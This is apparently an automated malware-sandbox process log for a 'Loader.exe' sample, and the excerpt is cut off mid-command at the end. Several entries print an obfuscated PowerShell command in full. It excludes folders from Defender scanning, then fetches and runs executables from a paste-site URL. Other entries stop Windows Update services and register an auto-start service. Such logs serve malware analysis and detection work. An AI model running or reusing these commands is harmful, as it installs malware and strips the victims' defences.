C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
5⤵
- Launches sc.exe
PID:3940

C:\Users\Admin\Desktop\Loader\Loader.exe
"C:\Users\Admin\Desktop\Loader\Loader.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976

C:\Users\Admin\AppData\Roaming\adebj4ig.t3j2.exe
"C:\Users\Admin\AppData\Roaming\adebj4ig.t3j2.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3476

C:\Users\Admin\AppData\Roaming\adebj4ig.t3j3.exe
"C:\Users\Admin\AppData\Roaming\adebj4ig.t3j3.exe"
4⤵
- Executes dropped EXE
PID:452

C:\Users\Admin\Desktop\Loader\Loader.exe
"C:\Users\Admin\Desktop\Loader\Loader.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4508

C:\Users\Admin\AppData\Roaming\avfexwas.ea22.exe
"C:\Users\Admin\AppData\Roaming\avfexwas.ea22.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2656

C:\Users\Admin\AppData\Roaming\avfexwas.ea23.exe
"C:\Users\Admin\AppData\Roaming\avfexwas.ea23.exe"
4⤵
- Executes dropped EXE
PID:3064

C:\Users\Admin\Desktop\Loader\Loader.exe
"C:\Users\Admin\Desktop\Loader\Loader.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4132

C:\Users\Admin\AppData\Roaming\jh4ig13t.k3u2.exe
"C:\Users\Admin\AppData\Roaming\jh4ig13t.k3u2.exe"
4⤵
PID:6052

C:\Users\Admin\AppData\Roaming\jh4ig13t.k3u3.exe
"C:\Users\Admin\AppData\Roaming\jh4ig13t.k3u3.exe"
4⤵
PID:6124

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:5752

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:3476

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:5500

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:5276

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:2544

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:5324

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:5916

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
PID:1804

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
PID:5892

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
PID:5956

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
PID:5988

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
5⤵
PID:1600

C:\Users\Admin\Desktop\Loader\Loader.exe
"C:\Users\Admin\Desktop\Loader\Loader.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3264

C:\Users\Admin\AppData\Roaming\pvb2kfsj.juf2.exe
"C:\Users\Admin\AppData\Roaming\pvb2kfsj.juf2.exe"
4⤵
PID:916

C:\Users\Admin\AppData\Roaming\pvb2kfsj.juf3.exe
"C:\Users\Admin\AppData\Roaming\pvb2kfsj.juf3.exe"
4⤵
PID:3468

C:\Users\Admin\Desktop\Loader\Loader.exe
"C:\Users\Admin\Desktop\Loader\Loader.exe"
2⤵
PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:5204

C:\Users\Admin\AppData\Roaming\uqbi3zfk.qi22.exe
"C:\Users\Admin\AppData\Roaming\uqbi3zfk.qi22.exe"
4⤵
PID:3300

C:\Users\Admin\AppData\Roaming\uqbi3zfk.qi23.exe
"C:\Users\Admin\AppData\Roaming\uqbi3zfk.qi23.exe"
4⤵
PID:5572

C:\Users\Admin\Desktop\Loader\Loader.exe
"C:\Users\Admin\Desktop\Loader\Loader.exe"
2⤵
PID:5664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:5876

C:\Users\Admin\AppData\Roaming\untr5i5u.otm2.exe
"C:\Users\Admin\AppData\Roaming\untr5i5u.otm2.exe"
4⤵
PID:6092

C:\Users\Admin\AppData\Roaming\untr5i5u.otm3.exe
"C:\Users\Admin\AppData\Roaming\untr5i5u.otm3.exe"
4⤵
PID:1356

C:\Users\Admin\Desktop\Loader\Loader.exe
"C:\Users\Admin\Desktop\Loader\Loader.exe"
2⤵
PID:3812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQA